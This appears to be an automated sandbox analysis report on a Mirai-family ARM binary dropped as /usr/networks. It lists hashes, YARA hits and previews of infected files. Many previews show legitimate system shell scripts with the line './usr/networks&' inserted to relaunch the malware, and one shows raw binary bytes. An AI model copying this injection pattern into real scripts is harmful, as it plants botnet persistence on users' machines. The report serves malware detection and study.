                                                                                                          Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                          /usr/networks
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                          Category:dropped
                                                                                                          Size (bytes):307960
                                                                                                          Entropy (8bit):5.819679405566689
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                          MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                          SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                          SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                          SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                          • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                          Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                          /usr/sbin/alsa-info.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text, with very long lines
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25983
                                                                                                          Entropy (8bit):5.455683610707543
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                          MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                          SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                          SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                          SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                          /usr/share/alsa-base/alsa-info.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text, with very long lines
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25464
                                                                                                          Entropy (8bit):5.453877096685684
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                          MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                          SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                          SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                          SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                          /usr/share/alsa/utils.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4725
                                                                                                          Entropy (8bit):5.44928341819888
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                          MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                          SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                          SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                          SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                          /usr/share/brltty/initramfs/brltty.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):46
                                                                                                          Entropy (8bit):3.925523369006428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                          MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                          SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                          SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                          SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                          /usr/share/cups/braille/cups-braille.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:UTF-8 Unicode text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3551
                                                                                                          Entropy (8bit):5.478748088887141
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                          MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                          SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                          SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                          SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                          /usr/share/cups/braille/index.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):590
                                                                                                          Entropy (8bit):5.080350031939274
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                          MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                          SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                          SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                          SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                          /usr/share/cups/braille/indexv3.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):945
                                                                                                          Entropy (8bit):4.9071581716168575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                          MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                          SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                          SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                          SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                          /usr/share/cups/braille/indexv4.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):818
                                                                                                          Entropy (8bit):4.8178661177968065
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                          MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                          SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                          SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                          SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                          /usr/share/debconf/confmodule.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:false
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/acpid/examples/ac.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/acpid/examples/default.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):309
                                                                                                          Entropy (8bit):4.972882784760757
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                          MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                          SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                          SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                          SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3647
                                                                                                          Entropy (8bit):4.544491450799858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                          MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                          SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                          SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                          SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                          /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:false
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:awk or perl script, ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1829
                                                                                                          Entropy (8bit):4.38604786798686
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                          MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                          SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                          SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                          SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                          /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):253
                                                                                                          Entropy (8bit):5.267626424494032
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                          MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                          SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                          SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                          SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                          Malicious:true
                                                                                                          Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                          /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1048
                                                                                                          Entropy (8bit):4.806462537404251
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                          MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                          SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                          SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                          SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
